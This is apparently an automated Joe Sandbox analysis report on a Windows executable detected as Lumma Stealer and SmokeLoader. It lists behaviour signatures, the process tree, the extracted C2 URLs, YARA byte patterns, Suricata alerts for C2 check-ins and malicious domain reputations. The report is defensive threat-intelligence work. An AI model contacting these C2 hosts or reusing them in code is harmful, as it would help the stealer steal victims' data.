Edit tour

Windows Analysis Report
oRKal761Qm.exe

Overview

General Information

Sample name:	oRKal761Qm.exe renamed because original name is a hash value
Original sample name:	bead29639262d9e62e74e23eb65eb480.exe
Analysis ID:	1494781
MD5:	bead29639262d9e62e74e23eb65eb480
SHA1:	bff76800b0eafca77ce5db423ceaed0a1885962b
SHA256:	18b275bc2019a1023703c48af79133bc6bdfce5ea68b72837c3ea96244d0ea7d
Tags:	exe
Infos:

Detection

LummaC, Go Injector, SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Go Injector

Yara detected SmokeLoader

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Checks if the current machine is a virtual machine (disk enumeration)

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sigma detected: Execution of Suspicious File Type Extension

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara signature match

Classification

Process Tree

System is w10x64

oRKal761Qm.exe (PID: 7500 cmdline: "C:\Users\user\Desktop\oRKal761Qm.exe" MD5: BEAD29639262D9E62E74E23EB65EB480)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

E9D3.exe (PID: 8076 cmdline: C:\Users\user\AppData\Local\Temp\E9D3.exe MD5: 85B1854B81D15AC9116AA200304D7CA0)

46F6.exe (PID: 4412 cmdline: C:\Users\user\AppData\Local\Temp\46F6.exe MD5: E624D8FC1206C879495A1F3A670F253D)

BitLockerToGo.exe (PID: 7300 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

ssegbth (PID: 7928 cmdline: C:\Users\user\AppData\Roaming\ssegbth MD5: BEAD29639262D9E62E74E23EB65EB480)

ssegbth (PID: 3396 cmdline: C:\Users\user\AppData\Roaming\ssegbth MD5: BEAD29639262D9E62E74E23EB65EB480)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://mzxn.ru/tmp/index.php", "http://100xmargin.com/tmp/index.php", "http://wgdnb4rc.xyz/tmp/index.php", "http://olinsw.ws/tmp/index.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\46F6.exe	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2175200910.0000000000690000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1869071575.00000000021D1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1869071575.00000000021D1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1868841024.00000000005CA000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3b83:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000008.00000002.2941945429.00007FF7CE067000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
00000000.00000002.1868741876.0000000000590000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000005.00000002.2175323602.00000000006F9000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3493:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000008.00000002.2923398094.000000C000F90000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000005.00000002.2175430377.00000000021C1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2175430377.00000000021C1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1868969005.0000000002090000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1868969005.0000000002090000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000008.00000000.2678731371.00007FF7CE067000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
00000005.00000002.2175219428.00000000006A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2175219428.00000000006A0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
Process Memory Space: 46F6.exe PID: 4412	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.46F6.exe.7ff7cd510000.9.unpack	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
8.0.46F6.exe.7ff7cd510000.0.unpack	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\ssegbth, CommandLine: C:\Users\user\AppData\Roaming\ssegbth, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ssegbth, NewProcessName: C:\Users\user\AppData\Roaming\ssegbth, OriginalFileName: C:\Users\user\AppData\Roaming\ssegbth, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\ssegbth, ProcessId: 7928, ProcessName: ssegbth

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.14.101

Timestamp:	2024-08-19T09:29:19.092234+0200
SID:	2054653
Severity:	1
Source Port:	49769
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Observed Lumma Stealer Related Domain (languagedscie .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-19T09:29:17.530049+0200
SID:	2054955
Severity:	1
Source Port:	49768
Destination Port:	443
Protocol:	TCP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:28:15.588614+0200
SID:	2039103
Severity:	1
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:30:00.813101+0200
SID:	2039103
Severity:	1
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (complaintsipzzx .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-08-19T09:29:18.037380+0200
SID:	2054952
Severity:	1
Source Port:	63992
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:30:26.084292+0200
SID:	2039103
Severity:	1
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:28:50.138098+0200
SID:	2039103
Severity:	1
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:30:32.578026+0200
SID:	2039103
Severity:	1
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:30:19.028848+0200
SID:	2039103
Severity:	1
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-19T09:29:23.077567+0200
SID:	2054653
Severity:	1
Source Port:	49772
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:28:21.024348+0200
SID:	2039103
Severity:	1
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:28:14.516287+0200
SID:	2039103
Severity:	1
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:28:16.666905+0200
SID:	2039103
Severity:	1
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Observed Lumma Stealer Related Domain (bassizcellskz .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-19T09:29:16.483913+0200
SID:	2054959
Severity:	1
Source Port:	49767
Destination Port:	443
Protocol:	TCP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 172.67.204.20

Timestamp:	2024-08-19T09:29:15.973082+0200
SID:	2054653
Severity:	1
Source Port:	49766
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:28:22.109299+0200
SID:	2039103
Severity:	1
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:28:18.847626+0200
SID:	2039103
Severity:	1
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (writerospzm .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-08-19T09:29:13.767664+0200
SID:	2054962
Severity:	1
Source Port:	63947
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (quialitsuzoxm .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-08-19T09:29:19.223911+0200
SID:	2054950
Severity:	1
Source Port:	64486
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:28:35.697332+0200
SID:	2039103
Severity:	1
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Observed Lumma Stealer Related Domain (bassizcellskz .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-19T09:29:12.662268+0200
SID:	2054959
Severity:	1
Source Port:	49764
Destination Port:	443
Protocol:	TCP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 172.67.166.231

Timestamp:	2024-08-19T09:29:14.702744+0200
SID:	2054653
Severity:	1
Source Port:	49765
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:28:32.231026+0200
SID:	2039103
Severity:	1
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:28:52.292928+0200
SID:	2039103
Severity:	1
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:30:13.155090+0200
SID:	2039103
Severity:	1
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:28:29.966215+0200
SID:	2039103
Severity:	1
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:28:12.364262+0200
SID:	2039103
Severity:	1
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-19T09:29:20.479199+0200
SID:	2054653
Severity:	1
Source Port:	49770
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:28:31.106868+0200
SID:	2039103
Severity:	1
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (bassizcellskz .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-08-19T09:29:11.970850+0200
SID:	2054958
Severity:	1
Source Port:	50771
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:28:34.392816+0200
SID:	2039103
Severity:	1
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-19T09:29:16.990282+0200
SID:	2054653
Severity:	1
Source Port:	49767
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:28:19.949247+0200
SID:	2039103
Severity:	1
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:28:17.765041+0200
SID:	2039103
Severity:	1
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 58.151.148.90

Timestamp:	2024-08-19T09:30:51.114459+0200
SID:	2039103
Severity:	1
Source Port:	61795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-19T09:29:13.516188+0200
SID:	2054653
Severity:	1
Source Port:	49764
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Observed Lumma Stealer Related Domain (deallerospfosu .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 172.67.204.20

Timestamp:	2024-08-19T09:29:15.230729+0200
SID:	2054961
Severity:	1
Source Port:	49766
Destination Port:	443
Protocol:	TCP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 58.151.148.90

Timestamp:	2024-08-19T09:30:57.878034+0200
SID:	2039103
Severity:	1
Source Port:	61796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 77.29.6.193

Timestamp:	2024-08-19T09:28:08.999158+0200
SID:	2039103
Severity:	1
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-19T09:29:17.979654+0200
SID:	2054653
Severity:	1
Source Port:	49768
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:28:11.289409+0200
SID:	2039103
Severity:	1
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:28:51.211914+0200
SID:	2039103
Severity:	1
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:28:27.745095+0200
SID:	2039103
Severity:	1
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Observed Lumma Stealer Related Domain (complaintsipzzx .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 104.21.14.101

Timestamp:	2024-08-19T09:29:18.541547+0200
SID:	2054953
Severity:	1
Source Port:	49769
Destination Port:	443
Protocol:	TCP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (mennyudosirso .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-08-19T09:29:16.998251+0200
SID:	2054956
Severity:	1
Source Port:	60883
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:30:07.367374+0200
SID:	2039103
Severity:	1
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:28:33.316557+0200
SID:	2039103
Severity:	1
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 58.151.148.90

Timestamp:	2024-08-19T09:31:03.858807+0200
SID:	2039103
Severity:	1
Source Port:	61797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (languagedscie .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-08-19T09:29:17.019200+0200
SID:	2054954
Severity:	1
Source Port:	60199
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (celebratioopz .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-08-19T09:29:13.542692+0200
SID:	2054964
Severity:	1
Source Port:	64114
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 58.151.148.90

Timestamp:	2024-08-19T09:31:11.757758+0200
SID:	2039103
Severity:	1
Source Port:	61798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (deallerospfosu .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-08-19T09:29:14.718473+0200
SID:	2054960
Severity:	1
Source Port:	50040
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:28:13.440933+0200
SID:	2039103
Severity:	1
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Observed Lumma Stealer Related Domain (writerospzm .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 172.67.166.231

Timestamp:	2024-08-19T09:29:14.290393+0200
SID:	2054963
Severity:	1
Source Port:	49765
Destination Port:	443
Protocol:	TCP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Observed Lumma Stealer Related Domain (quialitsuzoxm .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-19T09:29:19.884457+0200
SID:	2054951
Severity:	1
Source Port:	49770
Destination Port:	443
Protocol:	TCP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:28:28.890692+0200
SID:	2039103
Severity:	1
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 58.151.148.90

Timestamp:	2024-08-19T09:30:44.707686+0200
SID:	2039103
Severity:	1
Source Port:	61794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 189.163.89.217

Timestamp:	2024-08-19T09:28:10.187755+0200
SID:	2039103
Severity:	1
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: oRKal761Qm.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware
Source: https://mundoparachicas.space/imageFolio.cgi?qehii0w3ze9sn=nO6wgakvlUvUKyvVvRezNJaB0mAvGbPqVKo12a3LOUvhvPrA9eFcs3uIBjr2ICTAiCiRSrnI1BD1Zngf6t0fTw%3D%3D	Avira URL Cloud: Label: malware
Source: https://languagedscie.shop/api	Avira URL Cloud: Label: malware
Source: http://olinsw.ws/tmp/index.php	Avira URL Cloud: Label: malware
Source: http://100xmargin.com/tmp/index.php	Avira URL Cloud: Label: malware
Source: https://deallerospfosu.shop/C	Avira URL Cloud: Label: phishing
Source: https://celebratioopz.shop/api	Avira URL Cloud: Label: malware
Source: https://quialitsuzoxm.shop/api	Avira URL Cloud: Label: phishing
Source: http://mzxn.ru/tmp/index.php	Avira URL Cloud: Label: malware
Source: https://mussangroup.com/wp-content/images/pic5.jpg	Avira URL Cloud: Label: malware
Source: https://mennyudosirso.shop/api	Avira URL Cloud: Label: malware
Source: https://deallerospfosu.shop:443/api	Avira URL Cloud: Label: phishing
Source: https://deallerospfosu.shop/W	Avira URL Cloud: Label: phishing
Source: https://complaintsipzzx.shop/	Avira URL Cloud: Label: malware
Source: https://writerospzm.shop/api	Avira URL Cloud: Label: malware
Source: https://bassizcellskz.shop/api	Avira URL Cloud: Label: phishing
Source: https://complaintsipzzx.shop/api	Avira URL Cloud: Label: malware
Source: https://mennyudosirso.shop/	Avira URL Cloud: Label: malware
Source: https://mundoparachicas.space:443/imageFolio.cgi?qehii0w3ze9sn=nO6wgakvlUvUKyvVvRezNJaB0mAvGbPqVKo12	Avira URL Cloud: Label: malware
Source: https://languagedscie.shop/apip	Avira URL Cloud: Label: malware
Source: https://deallerospfosu.shop/	Avira URL Cloud: Label: phishing
Source: https://languagedscie.shop/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\ssegbth

Avira: detection malicious, Label: HEUR/AGEN.1318094

Found malware configuration

